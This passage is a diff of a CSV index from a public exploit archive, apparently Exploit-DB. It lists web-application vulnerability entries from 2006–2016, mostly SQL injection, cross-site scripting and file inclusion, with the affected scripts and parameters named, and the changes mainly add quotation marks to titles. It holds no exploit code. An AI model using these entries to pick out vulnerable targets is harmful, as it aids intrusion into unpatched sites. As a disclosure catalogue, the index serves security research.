28108,platforms/php/webapps/28108.txt,"MyMail 1.0 - 'login.php' Cross-Site Scripting",2006-06-26,botan,php,webapps,0 @@ -30212,10 +30216,10 @@ id,file,description,date,author,platform,type,port 28111,platforms/php/webapps/28111.txt,"OpenGuestbook 0.5 - header.php title Parameter Cross-Site Scripting",2006-06-26,simo64,php,webapps,0 28112,platforms/php/webapps/28112.txt,"OpenGuestbook 0.5 - view.php offset Parameter SQL Injection",2006-06-26,simo64,php,webapps,0 28113,platforms/php/webapps/28113.txt,"cPanel 10.8.1/10.8.2 - OnMouseover Cross-Site Scripting",2006-06-27,MexHackTeam.org,php,webapps,0 -28114,platforms/php/webapps/28114.txt,"CrisoftRicette 1.0 - Cookbook.php Remote File Inclusion",2006-06-27,CrAzY.CrAcKeR,php,webapps,0 +28114,platforms/php/webapps/28114.txt,"CrisoftRicette 1.0 - 'Cookbook.php' Remote File Inclusion",2006-06-27,CrAzY.CrAcKeR,php,webapps,0 28115,platforms/php/webapps/28115.txt,"MF Piadas 1.0 - admin.php Cross-Site Scripting",2006-06-27,botan,php,webapps,0 28116,platforms/java/webapps/28116.txt,"H-Sphere 2.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-27,r0t,java,webapps,0 -28117,platforms/php/webapps/28117.txt,"MF Piadas 1.0 - admin.php Remote File Inclusion",2006-06-27,botan,php,webapps,0 +28117,platforms/php/webapps/28117.txt,"MF Piadas 1.0 - 'admin.php' Remote File Inclusion",2006-06-27,botan,php,webapps,0 28119,platforms/php/webapps/28119.txt,"vCard PRO - gbrowse.php cat_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 28120,platforms/php/webapps/28120.txt,"vCard PRO - rating.php card_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 28121,platforms/php/webapps/28121.txt,"vCard PRO - create.php card_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 @@ -30233,7 +30237,7 @@ id,file,description,date,author,platform,type,port 28138,platforms/php/webapps/28138.txt,"SoftBiz Banner Exchange Script 1.0 - lostpassword.php PHPSESSID Parameter Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0 28139,platforms/php/webapps/28139.txt,"SoftBiz Banner Exchange Script 1.0 - gen_confirm_mem.php PHPSESSID Parameter Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0 28140,platforms/php/webapps/28140.txt,"SoftBiz Banner Exchange Script 1.0 - 'index.php' PHPSESSID Parameter Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0 -28141,platforms/php/webapps/28141.txt,"SiteBuilder-FX - top.php Remote File Inclusion",2006-06-01,MazaGi,php,webapps,0 +28141,platforms/php/webapps/28141.txt,"SiteBuilder-FX - 'top.php' Remote File Inclusion",2006-06-01,MazaGi,php,webapps,0 28142,platforms/php/webapps/28142.txt,"Diesel Joke Site - 'Category.php' SQL Injection",2006-07-01,black-code,php,webapps,0 28143,platforms/php/webapps/28143.pl,"SturGeoN Upload - Arbitrary File Upload",2006-07-01,"Jihad BENABRA",php,webapps,0 28146,platforms/php/webapps/28146.txt,"Vincent Leclercq News 5.2 - Cross-Site Scripting",2006-07-03,DarkFig,php,webapps,0 @@ -30255,7 +30259,7 @@ id,file,description,date,author,platform,type,port 28163,platforms/php/webapps/28163.txt,"PostNuke 0.6x/0.7x - Multiple Cross-Site Scripting Vulnerabilities",2006-07-04,rgod,php,webapps,0 28166,platforms/php/webapps/28166.pl,"LifeType 1.0.5 - 'index.php' Date Parameter SQL Injection",2006-07-05,"Alejandro Ramos",php,webapps,0 28167,platforms/php/webapps/28167.txt,"Invision Power Board 1.x/2.x - Multiple SQL Injections",2006-07-05,"CrAzY CrAcKeR",php,webapps,0 -28168,platforms/php/webapps/28168.txt,"Blog:CMS 4.1 - Thumb.php Remote File Inclusion",2006-07-05,"EllipSiS Security",php,webapps,0 +28168,platforms/php/webapps/28168.txt,"Blog:CMS 4.1 - 'Thumb.php' Remote File Inclusion",2006-07-05,"EllipSiS Security",php,webapps,0 28171,platforms/php/webapps/28171.txt,"Zyxware Health Monitoring System - Multiple Vulnerabilities",2013-09-09,"Sarahma Security",php,webapps,0 28273,platforms/php/webapps/28273.txt,"PHPSavant Savant2 - Stylesheet.php MosConfig_absolute_path Parameter Remote File Inclusion",2006-07-25,botan,php,webapps,0 28174,platforms/php/webapps/28174.txt,"Moodle 2.3.8/2.4.5 - Multiple Vulnerabilities",2013-09-09,"Ciaran McNally",php,webapps,0 @@ -30267,11 +30271,11 @@ id,file,description,date,author,platform,type,port 28180,platforms/php/webapps/28180.txt,"ATutor 1.5.x - 'admin/fix_content.php' 'submit' Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 28184,platforms/hardware/webapps/28184.txt,"D-Link DIR-505 1.06 - Multiple Vulnerabilities",2013-09-10,"Alessandro Di Pinto",hardware,webapps,0 28185,platforms/php/webapps/28185.txt,"glFusion 1.3.0 - 'search.php' 'cat_id' Parameter SQL Injection",2013-09-10,"Omar Kurt",php,webapps,0 -28190,platforms/php/webapps/28190.txt,"Extcalendar 2.0 - Extcalendar.php Remote File Inclusion",2006-07-07,Matdhule,php,webapps,0 +28190,platforms/php/webapps/28190.txt,"Extcalendar 2.0 - 'Extcalendar.php' Remote File Inclusion",2006-07-07,Matdhule,php,webapps,0 28191,platforms/php/webapps/28191.txt,"AjaXplorer 1.0 - Multiple Vulnerabilities",2013-09-10,"Trustwave's SpiderLabs",php,webapps,0 28192,platforms/php/webapps/28192.txt,"ATutor 1.5.3 - Multiple Input Validation Vulnerabilities",2006-07-08,securityconnection,php,webapps,0 28193,platforms/asp/webapps/28193.txt,"Webvizyon - SayfalaAltList.asp SQL Injection",2006-07-08,StorMBoY,asp,webapps,0 -28195,platforms/php/webapps/28195.txt,"RW::Download - stats.php Remote File Inclusion",2006-07-08,StorMBoY,php,webapps,0 +28195,platforms/php/webapps/28195.txt,"RW::Download - 'stats.php' Remote File Inclusion",2006-07-08,StorMBoY,php,webapps,0 28199,platforms/php/webapps/28199.txt,"Mambo Componen phpBB 1.2.4 - Multiple Remote File Inclusion",2006-07-09,h4ntu,php,webapps,0 28200,platforms/php/webapps/28200.txt,"Farsinews 3.0 - 'Tiny_mce_gzip.php' Directory Traversal",2006-07-10,armin390,php,webapps,0 28201,platforms/php/webapps/28201.txt,"Graffiti Forums 1.0 - Topics.php SQL Injection",2006-07-10,Paisterist,php,webapps,0 @@ -30283,9 +30287,9 @@ id,file,description,date,author,platform,type,port 28211,platforms/php/webapps/28211.txt,"Lazarus Guestbook 1.6 - codes-english.php show Parameter Cross-Site Scripting",2006-07-12,simo64,php,webapps,0 28212,platforms/php/webapps/28212.txt,"Lazarus Guestbook 1.6 - picture.php img Parameter Cross-Site Scripting",2006-07-12,simo64,php,webapps,0 28214,platforms/php/webapps/28214.txt,"PhotoCycle 1.0 - PhotoCycle.php Parameter Cross-Site Scripting",2006-07-13,Luny,php,webapps,0 -28215,platforms/php/webapps/28215.txt,"PHP Event Calendar 1.4 - calendar.php Remote File Inclusion",2006-07-13,Solpot,php,webapps,0 +28215,platforms/php/webapps/28215.txt,"PHP Event Calendar 1.4 - 'calendar.php' Remote File Inclusion",2006-07-13,Solpot,php,webapps,0 28216,platforms/php/webapps/28216.txt,"FlatNuke 2.5.7 - 'index.php' Remote File Inclusion",2006-07-13,rgod,php,webapps,0 -28217,platforms/php/webapps/28217.txt,"Forum 5 - pm.php Local File Inclusion",2006-07-13,rgod,php,webapps,0 +28217,platforms/php/webapps/28217.txt,"Forum 5 - 'pm.php' Local File Inclusion",2006-07-13,rgod,php,webapps,0 28219,platforms/php/webapps/28219.txt,"Dream4 Koobi Pro 5.6 - 'showtopic' Parameter SQL Injection",2006-07-13,"Evampire chiristof",php,webapps,0 28223,platforms/php/webapps/28223.txt,"Subberz Lite - UserFunc Remote File Inclusion",2006-07-14,"Chironex Fleckeri",php,webapps,0 28229,platforms/php/webapps/28229.txt,"VisNetic Mail Server 8.3.5 - Multiple File Inclusion",2006-07-17,"Tan Chew Keong",php,webapps,0 @@ -30300,12 +30304,12 @@ id,file,description,date,author,platform,type,port 28249,platforms/php/webapps/28249.txt,"GeoAuctions 1.0.6 Enterprise - 'index.php' d Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0 28250,platforms/php/webapps/28250.txt,"Geodesic Solutions Multiple Products - 'index.php' 'b' Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0 28251,platforms/php/webapps/28251.txt,"MiniBB 1.5 - 'news.php' Remote File Inclusion",2006-07-20,AG-Spider,php,webapps,0 -28253,platforms/php/webapps/28253.txt,"Advanced Poll 2.0.2 - common.inc.php Remote File Inclusion",2006-07-21,Solpot,php,webapps,0 +28253,platforms/php/webapps/28253.txt,"Advanced Poll 2.0.2 - 'common.inc.php' Remote File Inclusion",2006-07-21,Solpot,php,webapps,0 28255,platforms/php/webapps/28255.txt,"Chameleon LE 1.203 - 'index.php' Directory Traversal",2006-07-21,kicktd,php,webapps,0 28260,platforms/php/webapps/28260.txt,"Lussumo Vanilla 1.0 - RootDirectory Remote File Inclusion",2006-07-24,MFox,php,webapps,0 28261,platforms/php/webapps/28261.txt,"RadScripts - 'a_editpage.php' 'Filename' Parameter Arbitrary File Overwrite",2006-07-24,INVENT,php,webapps,0 28262,platforms/php/webapps/28262.txt,"MusicBox 2.3.4 - 'page' Parameter SQL Injection",2006-07-24,"EllipSiS Security",php,webapps,0 -28264,platforms/php/webapps/28264.txt,"Prince Clan Chess Club 0.8 - Include.PCchess.php Remote File Inclusion",2006-07-24,OLiBekaS,php,webapps,0 +28264,platforms/php/webapps/28264.txt,"Prince Clan Chess Club 0.8 - 'Include.PCchess.php' Remote File Inclusion",2006-07-24,OLiBekaS,php,webapps,0 28267,platforms/php/webapps/28267.txt,"LinksCaffe 3.0 - links.php Multiple Parameter SQL Injection",2006-07-25,simo64,php,webapps,0 28268,platforms/php/webapps/28268.txt,"LinksCaffe 3.0 - counter.php tablewidth Parameter Cross-Site Scripting",2006-07-25,simo64,php,webapps,0 28269,platforms/php/webapps/28269.txt,"LinksCaffe 3.0 - links.php newdays Parameter Cross-Site Scripting",2006-07-25,simo64,php,webapps,0 @@ -30320,7 +30324,7 @@ id,file,description,date,author,platform,type,port 28281,platforms/php/webapps/28281.txt,"phpBB-Auction 1.x - auction_room.php ar Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0 28282,platforms/php/webapps/28282.txt,"phpBB-Auction 1.x - auction_store.php u Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0 28283,platforms/hardware/webapps/28283.txt,"ZYXEL Prestige 660H-61 ADSL Router - Cross-Site Scripting",2006-07-27,jose.palanco,hardware,webapps,0 -28289,platforms/php/webapps/28289.txt,"Bosdates 3.x/4.0 - Payment.php Remote File Inclusion",2006-07-27,admin@jaascois.com,php,webapps,0 +28289,platforms/php/webapps/28289.txt,"Bosdates 3.x/4.0 - 'Payment.php' Remote File Inclusion",2006-07-27,admin@jaascois.com,php,webapps,0 28291,platforms/php/webapps/28291.txt,"MyBulletinBoard (MyBB) 1.x - 'usercp.php' Directory Traversal",2006-07-27,"Roozbeh Afrasiabi",php,webapps,0 28292,platforms/php/webapps/28292.txt,"GeoClassifieds Enterprise 2.0.5.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-07-27,"EllipSiS Security",php,webapps,0 28294,platforms/php/webapps/28294.txt,"PHP-Nuke - INP modules.php Cross-Site Scripting",2006-07-28,l2odon,php,webapps,0 @@ -30335,11 +30339,11 @@ id,file,description,date,author,platform,type,port 28307,platforms/php/webapps/28307.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'admin.php' Multiple Parameter SQL Injections",2006-07-31,SirDarckCat,php,webapps,0 28308,platforms/php/webapps/28308.txt,"Banex PHP MySQL Banner Exchange 2.21 - members.php cfg_root Parameter Remote File Inclusion",2006-07-31,SirDarckCat,php,webapps,0 28309,platforms/php/webapps/28309.txt,"Seir Anphin V666 Community Management System - Multiple SQL Injections",2006-07-31,CR,php,webapps,0 -28310,platforms/php/webapps/28310.txt,"Moskool 1.5 Component - Admin.Moskool.php Remote File Inclusion",2006-07-31,saudi.unix,php,webapps,0 +28310,platforms/php/webapps/28310.txt,"Moskool 1.5 Component - 'Admin.Moskool.php' Remote File Inclusion",2006-07-31,saudi.unix,php,webapps,0 28311,platforms/php/webapps/28311.txt,"myEvent 1.2/1.3 - 'myevent.php' Remote File Inclusion",2006-07-31,CeNGiZ-HaN,php,webapps,0 28315,platforms/php/webapps/28315.txt,"Help Center Live 2.1.2 - module.php Directory Traversal",2006-07-31,Dr.GooGle,php,webapps,0 28316,platforms/php/webapps/28316.txt,"TinyPHPForum 3.6 - Multiple Cross-Site Scripting Vulnerabilities (2)",2006-07-31,SirDarckCat,php,webapps,0 -28317,platforms/php/webapps/28317.txt,"WoW Roster 1.5 - hsList.php subdir Parameter Remote File Inclusion",2006-08-01,skulmatic,php,webapps,0 +28317,platforms/php/webapps/28317.txt,"WoW Roster 1.5 - 'hsList.php' 'subdir' Parameter Remote File Inclusion",2006-08-01,skulmatic,php,webapps,0 28318,platforms/php/webapps/28318.txt,"Knusperleicht Quickie - Quick_Path Parameter Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 28319,platforms/php/webapps/28319.txt,"Knusperleicht FAQ 1.0 Script - 'index.php' Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 28320,platforms/php/webapps/28320.txt,"Knusperleicht Guestbook 3.5 - GB_PATH Parameter Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 @@ -30357,29 +30361,29 @@ id,file,description,date,author,platform,type,port 28509,platforms/php/webapps/28509.txt,"XHP CMS 0.5.1 - 'index.php' Cross-Site Scripting",2006-09-11,"HACKERS PAL",php,webapps,0 28347,platforms/php/webapps/28347.txt,"XennoBB 2.1 - 'profile.php' Multiple SQL Injections",2006-08-07,"Chris Boulton",php,webapps,0 28349,platforms/php/webapps/28349.txt,"TurnkeyWebTools PHP Simple Shop 2.0 - Multiple Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0 -28350,platforms/php/webapps/28350.txt,"VWar 1.5 - war.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 -28351,platforms/php/webapps/28351.txt,"VWar 1.5 - member.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 -28352,platforms/php/webapps/28352.txt,"VWar 1.5 - calendar.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 -28353,platforms/php/webapps/28353.txt,"VWar 1.5 - challenge.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 -28354,platforms/php/webapps/28354.txt,"VWar 1.5 - joinus.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 -28355,platforms/php/webapps/28355.txt,"VWar 1.5 - news.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 -28356,platforms/php/webapps/28356.txt,"VWar 1.5 - stats.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 +28350,platforms/php/webapps/28350.txt,"VWar 1.5 - 'war.php' vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 +28351,platforms/php/webapps/28351.txt,"VWar 1.5 - 'member.php' vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 +28352,platforms/php/webapps/28352.txt,"VWar 1.5 - 'calendar.php' vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 +28353,platforms/php/webapps/28353.txt,"VWar 1.5 - 'challenge.php' vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 +28354,platforms/php/webapps/28354.txt,"VWar 1.5 - 'joinus.php' vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 +28355,platforms/php/webapps/28355.txt,"VWar 1.5 - 'news.php' vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 +28356,platforms/php/webapps/28356.txt,"VWar 1.5 - 'stats.php' vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 28359,platforms/php/webapps/28359.txt,"phpPrintAnalyzer 1.1 - 'index.php' Remote File Inclusion",2006-08-07,sh3ll,php,webapps,0 28362,platforms/php/webapps/28362.txt,"Simple One File Guestbook 1.0 - Security Bypass",2006-08-09,omnipresent,php,webapps,0 28363,platforms/php/webapps/28363.txt,"CLUB Nuke 2.0 - Multiple SQL Injections",2006-08-09,ASIANEAGLE,php,webapps,0 28364,platforms/php/webapps/28364.txt,"XennoBB 1.0.5/1.0.6/2.1/2.2 - profile.php Directory Traversal",2006-08-09,"Chris Boulton",php,webapps,0 28366,platforms/php/webapps/28366.txt,"MyBloggie 2.1.x - 'MyBloggie_Root_Path' Parameter Remote File Inclusion",2006-06-02,sh3ll,php,webapps,0 -28370,platforms/php/webapps/28370.txt,"Mafia Moblog 6 - Big.php Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0 +28370,platforms/php/webapps/28370.txt,"Mafia Moblog 6 - 'Big.php' Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0 28371,platforms/php/webapps/28371.txt,"YaBBSE 1.x - 'index.php' Cross-Site Scripting",2006-08-10,O.U.T.L.A.W,php,webapps,0 28372,platforms/php/webapps/28372.txt,"Tiny Web Gallery 1.5 - Image Parameter Multiple Remote File Inclusion",2006-08-10,x0r0n,php,webapps,0 28377,platforms/php/webapps/28377.txt,"WordPress Plugin Complete Gallery Manager 3.3.3 - Arbitrary File Upload",2013-09-18,Vulnerability-Lab,php,webapps,0 28378,platforms/php/webapps/28378.txt,"miniBloggie 1.0 - 'Fname' Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0 -28379,platforms/php/webapps/28379.txt,"WEBinsta Mailing List Manager 1.3 - Install3.php Remote File Inclusion",2006-08-10,"Philipp Niedziela",php,webapps,0 +28379,platforms/php/webapps/28379.txt,"WEBinsta Mailing List Manager 1.3 - 'Install3.php' Remote File Inclusion",2006-08-10,"Philipp Niedziela",php,webapps,0 28382,platforms/php/webapps/28382.txt,"WordPress Plugin WP-DB Backup 1.6/1.7 - edit.php Directory Traversal",2006-08-14,"marc & shb",php,webapps,0 28385,platforms/asp/webapps/28385.txt,"BlaBla 4U - Multiple Cross-Site Scripting Vulnerabilities",2006-08-14,Vampire,asp,webapps,0 28388,platforms/php/webapps/28388.txt,"PHP-Nuke 2.0 AutoHTML Module - Local File Inclusion",2006-08-15,MosT3mR,php,webapps,0 28390,platforms/php/webapps/28390.txt,"Lizge 20 - 'index.php' Multiple Remote File Inclusion",2006-08-15,Crackers_Child,php,webapps,0 -28392,platforms/php/webapps/28392.txt,"Zen Cart Web Shopping Cart 1.x - autoload_func.php autoLoadConfig[999][0][loadFile] Parameter Remote File Inclusion",2006-08-15,"James Bercegay",php,webapps,0 +28392,platforms/php/webapps/28392.txt,"Zen Cart Web Shopping Cart 1.x - 'autoload_func.php' 'autoLoadConfig[999][0][loadFile]' Parameter Remote File Inclusion",2006-08-15,"James Bercegay",php,webapps,0 28393,platforms/asp/webapps/28393.txt,"AspxCommerce 2.0 - Arbitrary File Upload",2013-09-19,SANTHO,asp,webapps,0 28396,platforms/php/webapps/28396.txt,"Mambo Component Reporter 1.0 - 'Reporter.sql.php' Remote File Inclusion",2006-08-16,Crackers_Child,php,webapps,0 28399,platforms/php/webapps/28399.txt,"CubeCart 3.0.x - Multiple Input Validation Vulnerabilities",2006-08-17,rgod,php,webapps,0 @@ -30405,7 +30409,7 @@ id,file,description,date,author,platform,type,port 28428,platforms/php/webapps/28428.txt,"YaPiG 0.9x - Thanks_comment.php Cross-Site Scripting",2006-10-13,Kuon,php,webapps,0 28429,platforms/php/webapps/28429.js,"MyBB 1.1.7 - Multiple HTML Injection Vulnerabilities",2006-08-26,Redworm,php,webapps,0 28430,platforms/php/webapps/28430.txt,"Jupiter CMS 1.1.5 - 'index.php' Remote File Inclusion",2006-08-26,D3nGeR,php,webapps,0 -28431,platforms/php/webapps/28431.txt,"Jetbox CMS 2.1 - Search_function.php Remote File Inclusion",2006-08-26,D3nGeR,php,webapps,0 +28431,platforms/php/webapps/28431.txt,"Jetbox CMS 2.1 - 'Search_function.php' Remote File Inclusion",2006-08-26,D3nGeR,php,webapps,0 28432,platforms/php/webapps/28432.txt,"BigACE 1.8.2 - 'item_main.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 28433,platforms/php/webapps/28433.txt,"BigACE 1.8.2 - 'upload_form.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 28434,platforms/php/webapps/28434.txt,"BigACE 1.8.2 - 'download.cmd.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 @@ -30444,9 +30448,9 @@ id,file,description,date,author,platform,type,port 28472,platforms/php/webapps/28472.txt,"Papoo CMS 3.2 - IBrowser Remote File Inclusion",2006-09-01,Ironfist,php,webapps,0 28473,platforms/php/webapps/28473.txt,"Autentificator 2.01 - Aut_Verifica.Inc.php SQL Injection",2006-09-02,SirDarckCat,php,webapps,0 28485,platforms/php/webapps/28485.txt,"WordPress Plugin NOSpamPTI - Blind SQL Injection",2013-09-23,"Alexandro Silva",php,webapps,0 -28486,platforms/php/webapps/28486.txt,"In-portal In-Link 2.3.4 - ADODB_DIR.php Remote File Inclusion",2006-09-04,"Saudi Hackrz",php,webapps,0 +28486,platforms/php/webapps/28486.txt,"In-portal In-Link 2.3.4 - 'ADODB_DIR.php' Remote File Inclusion",2006-09-04,"Saudi Hackrz",php,webapps,0 28487,platforms/php/webapps/28487.txt,"PHP-Nuke MyHeadlines 4.3.1 Module - Cross-Site Scripting",2006-09-04,"Thomas Pollet",php,webapps,0 -28488,platforms/php/webapps/28488.php,"PHP-Proxima 6.0 - BB_Smilies.php Local File Inclusion",2006-09-04,Kacper,php,webapps,0 +28488,platforms/php/webapps/28488.php,"PHP-Proxima 6.0 - 'BB_Smilies.php' Local File Inclusion",2006-09-04,Kacper,php,webapps,0 28490,platforms/php/webapps/28490.txt,"SoftBB 0.1 - Page Parameter Cross-Site Scripting",2006-09-05,ThE__LeO,php,webapps,0 28492,platforms/php/webapps/28492.txt,"Uni-vert PHPLeague 0.82 - Joueurs.php SQL Injection",2006-09-06,DrEiNsTeIn,php,webapps,0 28493,platforms/php/webapps/28493.txt,"PHP-Nuke Book Catalog Module 1.0 - 'upload.php' Arbitrary File Upload",2006-09-07,osm,php,webapps,0 @@ -30468,8 +30472,8 @@ id,file,description,date,author,platform,type,port 28517,platforms/php/webapps/28517.txt,"IDevSpot iSupport 1.8 - 'index.php' cons_page_title Parameter Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,php,webapps,0 40377,platforms/linux/webapps/40377.txt,"Open-Xchange Guard 2.4.2 - Multiple Cross-Site Scripting",2016-09-13,"Benjamin Daniel Mussler",linux,webapps,0 28518,platforms/php/webapps/28518.txt,"IDevSpot iSupport 1.8 - 'index.php' Remote File Inclusion",2006-09-12,s3rv3r_hack3r,php,webapps,0 -28519,platforms/php/webapps/28519.txt,"WM-News 0.5 - print.php Local File Inclusion",2006-09-12,"Daftrix Security",php,webapps,0 -28520,platforms/php/webapps/28520.txt,"Ractive Popper 1.41 - Childwindow.Inc.php Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 +28519,platforms/php/webapps/28519.txt,"WM-News 0.5 - 'print.php' Local File Inclusion",2006-09-12,"Daftrix Security",php,webapps,0 +28520,platforms/php/webapps/28520.txt,"Ractive Popper 1.41 - 'Childwindow.Inc.php' Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 28522,platforms/php/webapps/28522.txt,"Telekorn Signkorn Guestbook 1.x - 'index.php' dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 28523,platforms/php/webapps/28523.txt,"Telekorn Signkorn Guestbook 1.x - includes/functions.gb.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 28524,platforms/php/webapps/28524.txt,"Telekorn Signkorn Guestbook 1.x - includes/functions.admin.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 @@ -30605,13 +30609,13 @@ id,file,description,date,author,platform,type,port 28670,platforms/php/webapps/28670.txt,"DanPHPSupport 0.5 - 'index.php' page Parameter Cross-Site Scripting",2006-09-25,You_You,php,webapps,0 28671,platforms/php/webapps/28671.txt,"DanPHPSupport 0.5 - admin.php do Parameter Cross-Site Scripting",2006-09-25,You_You,php,webapps,0 28672,platforms/php/webapps/28672.pl,"BBSNew 2.0.1 - 'index2.php' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 -28673,platforms/php/webapps/28673.txt,"Exporia 0.3 - Common.php Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 +28673,platforms/php/webapps/28673.txt,"Exporia 0.3 - 'Common.php' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28674,platforms/php/webapps/28674.pl,"Back-End CMS 0.4.5 - admin/index.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28675,platforms/php/webapps/28675.txt,"Back-End CMS 0.4.5 - Facts.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28676,platforms/php/webapps/28676.txt,"Back-End CMS 0.4.5 - search.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28684,platforms/php/webapps/28684.txt,"Gnew 2013.1 - Multiple Vulnerabilities (2)",2013-10-02,"High-Tech Bridge SA",php,webapps,80 28685,platforms/php/webapps/28685.txt,"GLPI 0.84.1 - Multiple Vulnerabilities",2013-10-02,"High-Tech Bridge SA",php,webapps,0 -28686,platforms/php/webapps/28686.txt,"My-BIC 0.6.5 - Mybic_Server.php Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 +28686,platforms/php/webapps/28686.txt,"My-BIC 0.6.5 - 'Mybic_Server.php' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28687,platforms/php/webapps/28687.txt,"PHP_news 2.0 - 'user_user.php' language Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28688,platforms/php/webapps/28688.txt,"PHP_news 2.0 - 'admin/news.php' language Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28689,platforms/php/webapps/28689.txt,"PHP_news 2.0 - 'admin/catagory.php' language Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 @@ -30632,12 +30636,12 @@ id,file,description,date,author,platform,type,port 28734,platforms/php/webapps/28734.txt,"Yblog - 'uss.php' Cross-Site Scripting",2006-09-30,You_You,php,webapps,0 29275,platforms/cgi/webapps/29275.txt,"Netwin SurgeFTP 2.3a1 - SurgeFTPMGR.cgi Multiple Input Validation Vulnerabilities",2006-12-11,"Umesh Wanve",cgi,webapps,0 29276,platforms/asp/webapps/29276.txt,"Lotfian Request For Travel 1.0 - ProductDetails.asp SQL Injection",2006-12-11,ajann,asp,webapps,0 -28728,platforms/php/webapps/28728.txt,"Geotarget - script.php Remote File Inclusion",2006-09-29,"RaVeR shi mozi",php,webapps,0 +28728,platforms/php/webapps/28728.txt,"Geotarget - 'script.php' Remote File Inclusion",2006-09-29,"RaVeR shi mozi",php,webapps,0 28708,platforms/php/webapps/28708.txt,"elproLOG MONITOR Webaccess 2.1 - Multiple Vulnerabilities",2013-10-04,Vulnerability-Lab,php,webapps,80 28709,platforms/php/webapps/28709.txt,"FlashChat 6.0.2 < 6.0.8 - Arbitrary File Upload",2013-10-04,x-hayben21,php,webapps,80 28711,platforms/php/webapps/28711.txt,"PHP Invoice 2.2 - home.php Cross-Site Scripting",2006-09-26,meto5757,php,webapps,0 28712,platforms/php/webapps/28712.txt,"CMS Formulasi 2.07 - Multiple Vulnerabilities",2013-10-04,"Sarahma Security",php,webapps,80 -28714,platforms/php/webapps/28714.txt,"PHPSelect Web Development - index.php3 Remote File Inclusion",2006-09-27,rUnViRuS,php,webapps,0 +28714,platforms/php/webapps/28714.txt,"PHPSelect Web Development - 'index.php3' Remote File Inclusion",2006-09-27,rUnViRuS,php,webapps,0 29274,platforms/php/webapps/29274.html,"Horde Groupware Web Mail Edition 5.1.2 - Cross-Site Request Forgery (1)",2013-10-29,"Marcela Benetrix",php,webapps,80 28716,platforms/php/webapps/28716.txt,"MKPortal 1.0/1.1 - PMPopup.php Cross-Site Scripting",2006-09-27,HanowarS,php,webapps,0 29279,platforms/php/webapps/29279.txt,"Olat CMS 7.8.0.1 - Persistent Cross-Site Scripting",2013-10-29,Vulnerability-Lab,php,webapps,0 @@ -30647,7 +30651,7 @@ id,file,description,date,author,platform,type,port 28722,platforms/php/webapps/28722.txt,"Red Mombin 0.7 - process_login.php Unspecified Cross-Site Scripting",2006-09-22,"Armorize Technologies",php,webapps,0 28723,platforms/php/webapps/28723.txt,"Aanval 7.1 build 70151 - Multiple Vulnerabilities",2013-10-04,xistence,php,webapps,80 28736,platforms/php/webapps/28736.txt,"DeluxeBB 1.09 - 'Sig.php' Remote File Inclusion",2006-10-02,r0ut3r,php,webapps,0 -28737,platforms/php/webapps/28737.txt,"PHP Web Scripts Easy Banner - functions.php Remote File Inclusion",2006-10-02,"abu ahmed",php,webapps,0 +28737,platforms/php/webapps/28737.txt,"PHP Web Scripts Easy Banner - 'functions.php' Remote File Inclusion",2006-10-02,"abu ahmed",php,webapps,0 28738,platforms/php/webapps/28738.txt,"Digishop 4.0 - cart.php Cross-Site 